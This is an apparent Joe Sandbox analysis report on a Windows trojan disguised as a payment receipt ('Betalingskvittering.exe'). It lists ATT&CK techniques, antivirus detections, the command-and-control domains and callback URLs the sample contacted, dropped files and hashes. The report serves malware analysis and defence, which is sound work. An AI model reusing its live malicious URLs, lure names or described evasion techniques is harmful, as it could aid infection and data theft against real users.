Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection612	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Information Discovery114	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Betalingskvittering.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.Betalingskvittering.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
1.1.Betalingskvittering.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.cmd.exe.295d8d0.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.0.Betalingskvittering.exe.400000.3.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
0.2.Betalingskvittering.exe.f010000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.Betalingskvittering.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.Betalingskvittering.exe.400000.2.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
1.0.Betalingskvittering.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.0.Betalingskvittering.exe.400000.1.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
7.2.cmd.exe.31b796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.Betalingskvittering.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.Betalingskvittering.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
1.0.Betalingskvittering.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.Betalingskvittering.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
bobazzing.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X	0%	Avira URL Cloud	safe
http://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ==	0%	Avira URL Cloud	safe
www.bbyyn10.xyz/b0us/	100%	Avira URL Cloud	phishing
http://www.improvfilmproduction.com/b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X	0%	Avira URL Cloud	safe
http://www.joystoreworld.com/b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og==	0%	Avira URL Cloud	safe
http://www.rxgmarket.com/b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X	0%	Avira URL Cloud	safe
http://www.bobazzing.com/b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ==	0%	Avira URL Cloud	safe
http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X	100%	Avira URL Cloud	phishing
http://www.olympiaapartment.com/b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA==	0%	Avira URL Cloud	safe
http://www.insularrofioa.xyz/b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
inkedbreadcompany.com	34.102.136.180	true	false		unknown
malatirada.com	192.0.78.25	true	true		unknown
www.finansresultation.com	104.21.40.182	true	true		unknown
parkingpage.namecheap.com	198.54.117.217	true	false		high
bobazzing.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
www.rxgmarket.com	104.21.45.211	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
bbyyn10.xyz	142.4.98.67	true	true		unknown
improvfilmproduction.com	50.87.176.30	true	true		unknown
www.olympiaapartment.com	35.186.238.101	true	false		unknown
www.bbyyn10.xyz	unknown	unknown	true		unknown
www.chimichael.com	unknown	unknown	true		unknown
www.redeyeops.com	unknown	unknown	true		unknown
www.inkedbreadcompany.com	unknown	unknown	true		unknown
www.malatirada.com	unknown	unknown	true		unknown
www.insularrofioa.xyz	unknown	unknown	true		unknown
www.bobazzing.com	unknown	unknown	true		unknown
www.improvfilmproduction.com	unknown	unknown	true		unknown
www.joystoreworld.com	unknown	unknown	true		unknown
www.tucows.website	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.malatirada.com/b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X	true	Avira URL Cloud: safe	unknown
http://www.finansresultation.com/b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ==	true	Avira URL Cloud: safe	unknown
www.bbyyn10.xyz/b0us/	true	Avira URL Cloud: phishing	low
http://www.improvfilmproduction.com/b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X	true	Avira URL Cloud: safe	unknown
http://www.joystoreworld.com/b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og==	true	Avira URL Cloud: safe	unknown
http://www.rxgmarket.com/b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X	true	Avira URL Cloud: safe	unknown
http://www.bobazzing.com/b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ==	false	Avira URL Cloud: safe	unknown
http://www.bbyyn10.xyz/b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X	true	Avira URL Cloud: phishing	unknown
http://www.olympiaapartment.com/b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA==	false	Avira URL Cloud: safe	unknown
http://www.insularrofioa.xyz/b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmp	false	high
http://nsis.sf.net/NSIS_Error	Betalingskvittering.exe	false	high
http://nsis.sf.net/NSIS_ErrorError	Betalingskvittering.exe	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.54.117.217	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
35.186.238.101	www.olympiaapartment.com	United States	15169	GOOGLEUS	false
192.0.78.25	malatirada.com	United States	2635	AUTOMATTICUS	true
142.4.98.67	bbyyn10.xyz	United States	54600	PEGTECHINCUS	true
50.87.176.30	improvfilmproduction.com	United States	46606	UNIFIEDLAYER-AS-1US	true
104.21.45.211	www.rxgmarket.com	United States	13335	CLOUDFLARENETUS	true
34.102.136.180	inkedbreadcompany.com	United States	15169	GOOGLEUS	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
104.21.40.182	www.finansresultation.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510324
Start date:	27.10.2021
Start time:	17:48:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Betalingskvittering.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/2@13/9
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.8% (good quality ratio 10.8%) Quality average: 72.1% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 74% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.211.4.86 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.217	HTK TT600202109300860048866 Payment Proof.pdf.exe	Get hash	malicious	Browse	www.linuxsauce.net/euzn/?BZLHP=YcuDf72PrLj9v77cTtT+RdHZgYXigAT3c+U/UJpKvp19BOyUsvC11+Bo5KkRiH0TT7aa&TlTd=3fQxPL6PF
	pGaL44AsT9.exe	Get hash	malicious	Browse	www.gabriellamaxey.com/mxnu/?u6t=ThxXNBv89HE4&LZZxUjSP=DbmmFAt1aOxcCApgO6w979pQn2fp6kjdxew91QKgTI9qvdDZbTwBXJG52e+oCdqw4zUT2TPOEA==
	vaOHjT0co0.exe	Get hash	malicious	Browse	www.rh-et.com/hht8/?c4i4Bzu8=YYzUAHMmBpkaBxQecPevm2uxv/AgOlZRAEO+xcULTvAxNOfYBsVeCIlohnhUDcjiLYP5&uP=TnXTAHPPhFZp5fG0
	D6EXhDKWrd.exe	Get hash	malicious	Browse	www.mariadimitropoulou.com/noha/?3f-DJJ=OpI7f+0I7wz69HYhh96y4UfCxqU+B78KM76J860qGty5m2eJLl5CyDdv9lUYB30OtSbI&gd=Zxox
	eaeqZtiivz.exe	Get hash	malicious	Browse	www.gabriellamaxey.com/mxnu/?Y0GX7pLH=DbmmFAt1aOxcCApgO6w979pQn2fp6kjdxew91QKgTI9qvdDZbTwBXJG52eyoRNmzhjUF&0vB0i=8pIDRx4
	d0c7488tr739.exe	Get hash	malicious	Browse	www.noveltyrofjiy.xyz/u5eh/?sR0pj=RL30&d6A=HQwXNFwoB6n+YGXI3oGKCBkeNArRdglGFGwIL3CxiqbCTaQLC90OuFmH9gPLa3p+A/gJ
	ORD2021100866752371AC.exe	Get hash	malicious	Browse	www.24x7x366.com/gab8/?Y0Dx=k9y8d/XvYtKBLjwbt29axTfvzRBwxbjjmcfovaX0vrzPSMlBKv9voE/DCePWwHj/NYwY&nL3lC0=IxlpdH_xnP2
	Scan_34668000.exe	Get hash	malicious	Browse	www.rcdating.com/yjqn/?gHd=SJH122Bxba+bszdGdvPgzkJhaNlQ8BfIPC5UroK/FhtQFKGwLmgtuwvUsOAh6prSrkUZ4vn5oA==&hZP=ldMHgdcxDFU
	Swift Copy.exe	Get hash	malicious	Browse	www.ahktips.com/eods/?aBC8lvE=gr9/MU9R+Yb+ym3qu/cgmvjNsm8J65aE4ndR2EOILnYjdHNbTnRo0AVU5jWKfEfcUHZh&G4=Tbut2rPX
	HPMT ORDER LIST.exe	Get hash	malicious	Browse	www.solmep.info/n6be/?a6=kFO5GiJEltEyuD14fKksMWyfXyXOXLYRAJ6sNogu4SNNFIYLrFMp5gPNqUGPKnTkMW34&4hYl=8pPLKztPMLrhEvWP
	Cl8RbDkHcC.exe	Get hash	malicious	Browse	www.serpasboutiquedecarnes.com/mjyv/?0HzpcX=GHHu5aI1fnsie8656YDOT+LAztXxb9x2KscrCthUOJJ7/YsjGk80/pPjBXBwBSR8PTi4x5qn+w==&nN=BTntMX1
	SBGW#001232021.exe	Get hash	malicious	Browse	www.burnabytowtruck.com/etaf/?6lttpr=AEMTqKbuQHMy6OGu7QAPFQjWRaS7/TLQ/9+S+kY5i3qqw9hxTQyayBEnz2sH/Hv/bqA7&JFND6z=_84lfN-p
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	www.honeymaroc.com/ny9y/?SDH8q=KzrTopIpRT&T2Jp=IxL6aa9POVk2/nLI/TTHWUW0ayULExkH1BvNm/J+AIAeJy2IV/WFxaIlCH38IBuCkgnD
	Bank Swift Scan pdf.exe	Get hash	malicious	Browse	www.breakfastatbrittanys.com/di4c/?G0G=PBupkdaXnhk&od=eONJhOU0iPpRcHoncBMkBH/I39GU+8VlVflgHNq1AXvm36M2WTxvIfziEkhUCvplRe0f
	truck pictures.exe	Get hash	malicious	Browse	www.traderjoes-corp.com/cuig/?yTbXp6=D2cITgXAP54inNVSGd0jjZ70qoeAqEVTVUklQDxR8W4bcHn55PazcIr3ilQJX4YXDdO+&9rKPkT=2dfXcPxP_
	Orsha_NSC Contract 290720 Order for new shipment.xlsx	Get hash	malicious	Browse	www.asteroid.finance/b6a4/?l2J=9rutZVDXu850SJr&c0DH=qLtgNToVxwGBDLV3pgf7fmc+nXqwhZnGR9zX0c9pvpxyA4sUtmU5qFwMTQzWzRvD1UNyKQ==
	PO747484992.exe	Get hash	malicious	Browse	www.puravidaceuticals.com/i9nz/?F2JHEXoP=sr8sB85/9jXzXvsDoLcXfgv5W+iXND+2C7ErOGWvNyFtEWMFH/Qc7Jksnr/Ge8yFxs3b&cbrD=Urop
	YgAynTdpcncdnG4.exe	Get hash	malicious	Browse	www.listotwarty.net/c8ec/?g8LhOf9X=9kJmm5jq4+Scs8x1p1AmwQNwu7JKgzztT1FjvwsiqFLJpMHcpTtwSq3T1y9GRU+A/5g4&p2M=SN6LU2tHzzlXS8
	GosMzUpnGu.exe	Get hash	malicious	Browse	www.sewmenship.com/rqe8/?s48tpP=5jDD&f81Ludbx=Ol8e0pkv5jqXu1bpp/M/YlDE69Xif3SEJEPQHpmlqEU4QgudPLiFM5P+hjjw4+q0GSrM
	TPAYWUFxTV.exe	Get hash	malicious	Browse	www.tianconghuo.club/kzk9/?oXIxyz4=D61rAPfTKbs2fBSgXwtfSb/i2DxzAhnQY0zC+1Bk9ZPL8tgAxhUB/kywMfA8gC1BXeBV&eJE=B6APwX8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	Payment Advice.exe	Get hash	malicious	Browse	198.54.117.215
	payment advice0272110.exe	Get hash	malicious	Browse	198.54.117.215
	DHL.exe	Get hash	malicious	Browse	198.54.117.212
	Order of CB-15GL PO530_pdf.exe	Get hash	malicious	Browse	198.54.117.212
	RFQ_PI02102110.exe	Get hash	malicious	Browse	198.54.117.216
	cNOilTxTR3.exe	Get hash	malicious	Browse	198.54.117.218
	lCFjxhAqu3.exe	Get hash	malicious	Browse	198.54.117.212
	Amended Order.xlsx	Get hash	malicious	Browse	198.54.117.215
	OS-QTN-0320-21-Rev1.exe	Get hash	malicious	Browse	198.54.117.210
	1.exe	Get hash	malicious	Browse	198.54.117.215
	DRAFT CONTRACT 0000499000-1100928777-pdf.exe	Get hash	malicious	Browse	198.54.117.211
	U8NUCQkg3s.exe	Get hash	malicious	Browse	198.54.117.218
	#U041a#U0430#U0441#U043e#U0432#U0430 #U0431#U0435#U043b#U0435#U0436#U043a#U0430.exe	Get hash	malicious	Browse	198.54.117.216
	triage_dropped_file.exe	Get hash	malicious	Browse	198.54.117.212
	2500010PO.excel.exe	Get hash	malicious	Browse	198.54.117.216
	MAERSK LINE SHIPPING DOCUMENT_pdf.exe	Get hash	malicious	Browse	198.54.117.212
	triage_dropped_file.exe	Get hash	malicious	Browse	198.54.117.212
	F9ObnUc4ol.exe	Get hash	malicious	Browse	198.54.117.211
	notification@dhl.com,pdf.exe	Get hash	malicious	Browse	198.54.117.217
	_Payment Advise.doc	Get hash	malicious	Browse	198.54.117.210
shops.myshopify.com	payment advice0272110.exe	Get hash	malicious	Browse	23.227.38.74
	E1PGk0W2AH.exe	Get hash	malicious	Browse	23.227.38.74
	Order of CB-15GL PO530_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	cNOilTxTR3.exe	Get hash	malicious	Browse	23.227.38.74
	Unpaid invoice.exe	Get hash	malicious	Browse	23.227.38.74
	Original Shipping documents.doc	Get hash	malicious	Browse	23.227.38.74
	85dpq7juao.exe	Get hash	malicious	Browse	23.227.38.74
	New Order 785298600.doc	Get hash	malicious	Browse	23.227.38.74
	Order Requiremnt-Oct-2021.exe	Get hash	malicious	Browse	23.227.38.74
	PO4502151388.excel.exe	Get hash	malicious	Browse	23.227.38.74
	Minutes of Meeting 23.10.2021.exe	Get hash	malicious	Browse	23.227.38.74
	SHIPPING DOCUMENT.exe	Get hash	malicious	Browse	23.227.38.74
	DHL_119040 receipt document,pdf.exe	Get hash	malicious	Browse	23.227.38.74
	F30AGnBthja6Ka2.exe	Get hash	malicious	Browse	23.227.38.74
	ouB4vwDfpl.exe	Get hash	malicious	Browse	23.227.38.74
	Remittance_Advice.exe	Get hash	malicious	Browse	23.227.38.74
	DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx	Get hash	malicious	Browse	23.227.38.74
	Ot4xf3fDJu.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ REF R22017582.xlsx	Get hash	malicious	Browse	23.227.38.74
	SDL_Order Onay#U0131 _ Acil,pdf.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	10272021-AM65Application.HTM	Get hash	malicious	Browse	104.219.248.99
	Payment Advice.exe	Get hash	malicious	Browse	198.54.117.215
	Tfwyelel3H.exe	Get hash	malicious	Browse	192.64.119.254
	QQIksbWrVl.exe	Get hash	malicious	Browse	63.250.40.204
	SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exe	Get hash	malicious	Browse	198.54.126.156
	DUT2Aj4C2x.exe	Get hash	malicious	Browse	185.61.153.108
	Swift Payment Notification.xlsx	Get hash	malicious	Browse	63.250.40.204
	MT103USD.xlsx	Get hash	malicious	Browse	63.250.40.204
	DHL_document11022020680908911.exe	Get hash	malicious	Browse	198.54.114.114
	payment advice0272110.exe	Get hash	malicious	Browse	198.54.117.215
	R0ptlo2GB2.exe	Get hash	malicious	Browse	63.250.40.204
	QRT#U00a0(20211027#00001)#U00a0ACSAM-6000RC Quote.exe	Get hash	malicious	Browse	63.250.40.204
	Order.exe	Get hash	malicious	Browse	192.64.119.74
	PNkEr1lc2k.exe	Get hash	malicious	Browse	63.250.40.204
	Enquiry docs_001.exe	Get hash	malicious	Browse	63.250.40.204
	PO 211027-031A.exe	Get hash	malicious	Browse	63.250.40.204
	PO_SBK4128332S.exe	Get hash	malicious	Browse	198.54.114.114
	DHL.exe	Get hash	malicious	Browse	198.54.117.212
	payment advice_16000.exe	Get hash	malicious	Browse	198.187.31.161
	SffoWy1XRL.exe	Get hash	malicious	Browse	63.250.40.204
AUTOMATTICUS	payment advice0272110.exe	Get hash	malicious	Browse	192.0.78.24
	DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe	Get hash	malicious	Browse	74.114.154.18
	B64AB676FFE01925ADC506EEBCC62F6EDC901E017C339.exe	Get hash	malicious	Browse	74.114.154.22
	p3IJWYfJZw.exe	Get hash	malicious	Browse	74.114.154.18
	rrte40912.exe	Get hash	malicious	Browse	192.0.78.24
	DHL DOC ARRIVAL#20008.exe	Get hash	malicious	Browse	192.0.78.250
	obizx.exe	Get hash	malicious	Browse	192.0.78.25
	6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe	Get hash	malicious	Browse	74.114.154.18
	triage_dropped_file.exe	Get hash	malicious	Browse	192.0.78.25
	seasonzx.exe	Get hash	malicious	Browse	192.0.78.25
	AB948F038175411DC326A1AAD83DF48D6B65632501551.exe	Get hash	malicious	Browse	74.114.154.22
	365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe	Get hash	malicious	Browse	74.114.154.22
	C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe	Get hash	malicious	Browse	74.114.154.22
	uu5009125.exe	Get hash	malicious	Browse	192.0.78.24
	mmhr56001.exe	Get hash	malicious	Browse	192.0.78.24
	afTyhpBvrtJlTWH.exe	Get hash	malicious	Browse	192.0.78.25
	TDCKZy88Av.exe	Get hash	malicious	Browse	192.0.78.24
	hoho.x86	Get hash	malicious	Browse	87.250.173.253
	4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exe	Get hash	malicious	Browse	74.114.154.22
	74BAFD56C1FB3CDEBF0A63DE4FFB6F16DC1D5CEE38E11.exe	Get hash	malicious	Browse	74.114.154.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\i7pwu380h7n Download File
Process:	C:\Users\user\Desktop\Betalingskvittering.exe
File Type:	data
Category:	dropped
Size (bytes):	215215
Entropy (8bit):	7.992329094749247
Encrypted:	true
SSDEEP:	3072:eA5GQGC4njU2psXYtX3gPJJwjNsG+t4bgIVvJvbBywA6jptYemg8fiz/jBKJMS5E:TGQGC4nXpsXe3gQjVJvJvbBy6vtmgmCz
MD5:	C5A456DA3811B77C89383F30A05D56FA
SHA1:	FE6C5EDC9EEDF65268B6F4E0DBEDDC68DE167026
SHA-256:	0ADF70BEEE33A271CEF0F2E00F1A1B64F3219BB5464EE837E13FA95470BD351C
SHA-512:	27E1ED54D2F889F4F7075351DF49B1C9307F3879A8924BED7C47B91361D318242E0E62CB022FF6DD94C805FC83AC1796F856FDCC0AA956D1824509DEB531FD70
Malicious:	false
Reputation:	low
Preview:	;.q..........u...\|.!O.)......h(.$auSz...ML.p..BY%.[...;...zd....P...w...g].C.BQ.a....X.r.X(h.)..t2...:..1.#poHL............._...........4;$..pZ.J%.>.....'N.Cye....F.+..;........X.H..51rIW.c,.........v.QN....E.!bHcc...>.r.]...1.U.._.+.FZ.Qp..#A.p2p.%..:......V.....m.....G...Vp.h(.$-uSZ...ML.W..BY%.[...;...z..,b.6.<...\|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o.7..L....._HcIn1..3.c......B..vb,.Y....!bHcc..f%.r.7...wU....+#FZ..p.O#..p2p.,..:.........\|..m...P.....Vp0h(.$auSz...ML.p..BY%.[...;...z..,b.6.<...\|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o......._/.Hc.n1..g.c,......B..vb,....E.!bHcc..f%.r.7...wU....+#FZ..p.O#..p2p.,..:.........\|..m...P.....Vp0h(.$auSz...ML.p..BY%.[...;...z..,b.6.<...\|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o......._/.Hc.n1..g.c,......B..vb,....E.!bHcc..f%.r.7..

C:\Users\user\AppData\Local\Temp\nspE572.tmp\nkcyodylqw.dll Download File
Process:	C:\Users\user\Desktop\Betalingskvittering.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	6.655068942176116
Encrypted:	false
SSDEEP:	384:UwOO8o3orkAkGZWeEqhEPVBNyzFhDYjrUYDo7NubnRTHX25uCcxtJsIvb:Fdz3orwGZWpPIkjnoJCB25atJsy
MD5:	5F44E4E9F9FE113F0D1AB278DC89EAD8
SHA1:	B7C72FDC24D4D131D387784E8D88D1ADED4DDCDB
SHA-256:	0EE64FC9C60DA614EA871B861A9527EEB9B77FA765A87748DE28B62766033A90
SHA-512:	AFB85AD0FF22059132EF4A6EEF96B17F7A452DF32565F73156935604AB559608748BD856B3129B6973C5DEDB1BC85582942D9E2587B80F2A667281011C1D65D7
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ..ADH.ADH.ADH/.H.ADHY^@H.ADH2]JH.ADHY^NH.ADH.EI.ADH.AEH.ADH&.@I.ADH&.DI.ADH#..H.ADH&.FI.ADHRich.ADH................PE..L.....ya...........!.....$...*...............@............................................@.........................pA..H....C.......p..............................PA...............................................@...............................text....#.......$.................. ..`.rdata..R....@.......(..............@..@.data...d....P.......2..............@....rsrc........p.......L..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.45883386860137
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Betalingskvittering.exe
File size:	334436
MD5:	ff904170ad5767db6b6066400972cc99
SHA1:	ae326e46c0a7649659faca436ddefc232f3f18d7
SHA256:	ee4b441c93ac2eb13f0cc02b060836e8538fa08bc434cf8b87552f820dc8563e
SHA512:	eadc3aa0abd94c4ae1f9bcc3e0780faad6d8065b7c2f19f804e37dea1efc2332d55a9d24ee01a258192751ff31a8eebe02edf463c8c588c5db1db33e727646c8
